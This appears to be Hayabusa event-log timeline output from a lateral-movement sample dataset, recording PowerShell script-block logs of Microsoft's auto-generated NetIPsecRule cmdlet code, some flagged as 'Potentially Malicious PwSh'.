[Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPh",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:38.081 +09:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious PwSh,"ase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('IPsecRuleName') -and (@('ByIPsecRuleName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${IPsecRuleName}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Mode') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Mode}) $__cmdletization_queryBuilder.FilterByProperty('Mode', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('InboundSecurity') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${InboundSecurity}) $__cmdletization_queryBuilder.FilterByProperty('InboundSecurity', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('OutboundSecurity') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${OutboundSecurity}) $__cmdletization_queryBuilder.FilterByProperty('OutboundSecurity', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('QuickModeCryptoSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${QuickModeCryptoSet}) $__cmdletization_queryBuilder.FilterByProperty('QuickModeCryptoSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase1AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase1AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase1AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase2AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase2AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase2AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('KeyModule') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${KeyModule}) $__cmdletization_queryBuilder.FilterByProperty('KeyModule', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AllowWatchKey') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${AllowWatchKey}) $__cmdletization_queryBuilder.FilterByProperty('AllowWatchKey', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AllowSetKey') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${AllowSetKey}) $__cmdletization_queryBuilder.FilterByProperty('AllowSetKey', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('RemoteTunnelHostname') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${RemoteTunnelHostname}) $__cmdletization_queryBuilder.FilterByProperty('RemoteTunnelEndpointDNSName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('ForwardPathLifetime') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${ForwardPathLifetime}) $__cmdletization_queryBuilder.FilterByProperty('MaxReturnPathLifetimeSeconds', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('EncryptedTunnelBypass') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${EncryptedTunnelBypass}) $__cmdletization_queryBuilder.FilterByProperty('BypassTunnelIfEncrypted', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('RequireAuthorization') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${RequireAuthorization}) $__cmdletization_queryBuilder.FilterByProperty('RequireAuthorization', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('User') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${User}) $__cmdletization_queryBuilder.FilterByProperty('Users', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Machine') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Machine}) $__cmdletization_queryBuilder.FilterByProperty('Machines', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetConSecRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceFilter') -and (@('ByAssociatedNetFirewallInterfaceFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceFilter}, 'MSFT_NetConSecRuleFilterByInterface', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceTypeFilter') -and (@('ByAssociatedNetFirewallInterfaceTypeFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceTypeFilter}, 'MSFT_NetConSecRuleFilterByInterfaceType', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallPortFilter') -and (@('ByAssociatedNetFirewallPortFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallPortFilter}, 'MSFT_NetConSecRuleFilterByProtocolPort', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetConSecRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase2AuthSet') -and (@('ByAssociatedNetIPsecPhase2AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase2AuthSet}, 'MSFT_NetConSecRuleEMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase1AuthSet') -and (@('ByAssociatedNetIPsecPhase1AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase1AuthSet}, 'MSFT_NetConSecRuleMMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecQuickModeCryptoSet') -and (@('ByAssociatedNetIPsecQuickModeCryptoSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecQuickModeCryptoSet}, 'MSFT_NetConSecRuleQMCryptoSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll', 'InputObject (cdxml)') -contains $_ } { $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:DeleteInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Remove-NetIPsecRule' -Alias '*' function Rename-NetIPsecRule { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] param( [Parameter(ParameterSetName='ByIPsecRuleName', Mandatory=$true, Position=0, ValueFromPipelineByPropertyName=$true)] [Alias('ID','Name')] [ValidateNotNull()] [string[]] ${IPsecRuleName}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecMode[]] ${Mode}, [Parameter(ParameterSetName='ByQuery')] [Alias('SecIn')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy[]] ${InboundSecurity}, [Parameter(ParameterSetName='ByQuery')] [Alias('SecOut')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy[]] ${OutboundSecurity}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${QuickModeCryptoSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase1AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase2AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyModule[]] ${KeyModule}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${AllowWatchKey}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${AllowSetKey}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${RemoteTunnelHostname}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [uint32[]] ${ForwardPathLifetime}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${EncryptedTunnelBypass}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${RequireAuthorization}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${User}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] $",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:38.081 +09:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,"ase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('IPsecRuleName') -and (@('ByIPsecRuleName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${IPsecRuleName}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Mode') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Mode}) $__cmdletization_queryBuilder.FilterByProperty('Mode', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('InboundSecurity') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${InboundSecurity}) $__cmdletization_queryBuilder.FilterByProperty('InboundSecurity', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('OutboundSecurity') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${OutboundSecurity}) $__cmdletization_queryBuilder.FilterByProperty('OutboundSecurity', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('QuickModeCryptoSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${QuickModeCryptoSet}) $__cmdletization_queryBuilder.FilterByProperty('QuickModeCryptoSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase1AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase1AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase1AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase2AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase2AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase2AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('KeyModule') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${KeyModule}) $__cmdletization_queryBuilder.FilterByProperty('KeyModule', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AllowWatchKey') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${AllowWatchKey}) $__cmdletization_queryBuilder.FilterByProperty('AllowWatchKey', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AllowSetKey') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${AllowSetKey}) $__cmdletization_queryBuilder.FilterByProperty('AllowSetKey', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('RemoteTunnelHostname') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${RemoteTunnelHostname}) $__cmdletization_queryBuilder.FilterByProperty('RemoteTunnelEndpointDNSName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('ForwardPathLifetime') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${ForwardPathLifetime}) $__cmdletization_queryBuilder.FilterByProperty('MaxReturnPathLifetimeSeconds', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('EncryptedTunnelBypass') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${EncryptedTunnelBypass}) $__cmdletization_queryBuilder.FilterByProperty('BypassTunnelIfEncrypted', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('RequireAuthorization') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${RequireAuthorization}) $__cmdletization_queryBuilder.FilterByProperty('RequireAuthorization', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('User') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${User}) $__cmdletization_queryBuilder.FilterByProperty('Users', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Machine') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Machine}) $__cmdletization_queryBuilder.FilterByProperty('Machines', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetConSecRuleFilterByAddress', 